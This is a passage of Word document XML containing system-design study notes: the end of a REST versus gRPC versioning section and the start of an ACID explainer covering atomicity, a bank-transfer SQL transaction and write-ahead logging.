    <w:p w14:paraId="66FF0AAF" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Additive changes (new fields, new endpoints): backward-compatible, no version bump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149C273" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  Breaking changes (remove/rename fields, change semantics): new version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B59EAD" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03953814" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  REST: /v1/orders → /v2/orders (URL versioning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9519F5" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  gRPC: package orders.v1 → orders.v2 (proto package versioning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09117272" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6039DB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">  In both: never remove a field used by clients without deprecation window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F987A78" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">           proto: reserve field numbers + names after removal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479F4DCC" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t xml:space="preserve">           REST: sunset header announcing deprecation timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45785CDB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:lastRenderedPageBreak/>
        <w:t>The deepest insight at a senior level: </w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the choice between REST and gRPC is not primarily a technical decision — it is a statement about who your consumers are and what contract you are making with them.</w:t>
      </w:r>
      <w:r w:rsidRPr="0037017A">
        <w:t> REST is an implicit social contract: "I will maintain a stable URL structure and JSON schema, documented in human language, that any HTTP client can consume without special tooling." gRPC is a formal technical contract: "I will maintain a .proto file that is the machine-enforced source of truth, and any client must compile against this schema." The REST contract is easier to consume and harder to enforce; the gRPC contract is harder to consume and trivially enforced by the compiler. For external-facing APIs where consumers are diverse and unknown, the easy-to-consume REST contract is almost always correct. For internal service-to-service communication where teams control both sides, the enforced gRPC contract eliminates entire categories of production incidents — field renames caught by the compiler rather than discovered at 3am when a service silently starts receiving null values. The engineers who consistently build reliable distributed systems understand that the schema is not documentation for humans — it is the specification for the compiler, and the compiler is a far more reliable enforcer of compatibility than any human review process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F1DEB" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Top of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B8A7A" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:r w:rsidRPr="0037017A">
        <w:t>Block pasted, 1 total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C3672" w14:textId="77777777" w:rsidR="0037017A" w:rsidRPr="0037017A" w:rsidRDefault="0037017A" w:rsidP="0037017A">
      <w:pPr>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0037017A">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Bottom of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDB931E" w14:textId="51A7B76B" w:rsidR="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00AD5AD3">
      <w:r>
        <w:t>---------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FD21A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ACID Properties in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBFA85" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What ACID Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56C0AC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>ACID is the set of four properties that guarantee database transactions are processed reliably, maintaining data correctness even in the face of errors, crashes, concurrent access, and hardware failures. It's the contract a database makes about the behavior of transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A3FCD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DE99F4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">Transaction: A logical unit of work — a sequence of operations that must either </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4F07E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>ALL succeed together or ALL fail together, leaving no partial effects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674AFD38" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="42E13951" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Example transaction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5560A873" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B1D50" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance - 100 WHERE id = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29108897" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  UPDATE accounts SET balance = balance + 100 WHERE id = 'Bob';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54CC83" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  COMMIT;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236BE9E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="293B8526" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>This must NEVER result in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FBCCC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Alice debited but Bob not credited (partial failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AACE94" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Money appearing or disappearing (inconsistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC3CFF9" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Two transfers interfering with each other (race condition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E2C84" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  - Committed data lost after confirmation (durability violation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CEB279" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The four properties: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83"/>
        <w:gridCol w:w="3505"/>
        <w:gridCol w:w="4162"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="1E14507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A1A2CD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Property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EF59F4" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Guarantee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5ACA6C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Question It Answers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="68E9B63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60177D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>tomicity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71CE9B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>All or nothing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0FF2FD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>"What if the system crashes mid-transaction?"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="5102792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0041CE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>onsistency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E97645" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Valid state to valid state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6B0744" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>"Can the data ever be in an illegal state?"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="7C5C795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EE582E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>solation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B9D173" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Concurrent transactions don't interfere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A50277" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>"What if two transactions touch the same data?"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w14:paraId="3DE9646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A76D27" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>urability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13185A" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>Committed data survives crashes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9A34D3" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
            <w:r w:rsidRPr="00EF2B0F">
              <w:t>"What if the server dies right after COMMIT?"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DBED1BD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:pict w14:anchorId="06FB44A9">
          <v:rect id="_x0000_i6695" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C810A36" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Atomicity — All or Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D71AF8E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68B0AD" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>A transaction is atomic: either ALL its operations are applied, or NONE are. There is no state where only some operations of a transaction are visible. If anything goes wrong, the entire transaction is rolled back as if it never happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644ED1BC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED100EC" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Scenario: Transfer $100 from Alice to Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D3F97" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="441D663D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
        <w:t>WITHOUT atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E7F8AB" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Step 1: Debit Alice -$100     ✓ (succeeds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3B8F09" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Step 2: Credit Bob +$100      </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve"> (system crashes!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB4116" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432CA35D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Result: Alice lost $100, Bob gained nothing. Money vanished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283ED5F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="3A360D09" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>WITH atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469EDC99" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Step 1: Debit Alice -$100     ✓ (tentative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5781BA9D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Step 2: Credit Bob +$100      </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve"> (system crashes!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E0FB7E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CDE2D" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Recovery: Both steps rolled back. Alice still has her $100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E84302E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  Result: As if the transaction never started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039014C" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 How Atomicity Is Implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F37702" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write-Ahead Log (WAL) / Redo Log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08295CA0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D32045" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>The key mechanism: BEFORE modifying data pages, write the intended changes to a log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F89CF1B" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="64DB290E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t>Transaction execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C2EDCE" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  1. BEGIN transaction T1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F29CB02" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  2. Write to WAL: "T1: page 47, offset 128, old_value=500, new_value=400" (Alice -100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DD708" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  3. Write to WAL: "T1: page 89, offset 64, old_value=200, new_value=300"  (Bob +100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F1670" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  4. Modify actual data pages in memory (buffer pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC99F0" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  5. Write to WAL: "T1: COMMIT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A3818" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  6. Flush WAL to disk (fsync)  ← this is the COMMIT POINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5216DB7E" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:t xml:space="preserve">  7. Acknowledge to client: "Committed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF4478" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F"/>
    <w:p w14:paraId="6322854F" w14:textId="77777777" w:rsidR="00EF2B0F" w:rsidRPr="00EF2B0F" w:rsidRDefault="00EF2B0F" w:rsidP="00EF2B0F">
      <w:r w:rsidRPr="00EF2B0F">
        <w:lastRenderedPageBreak/>
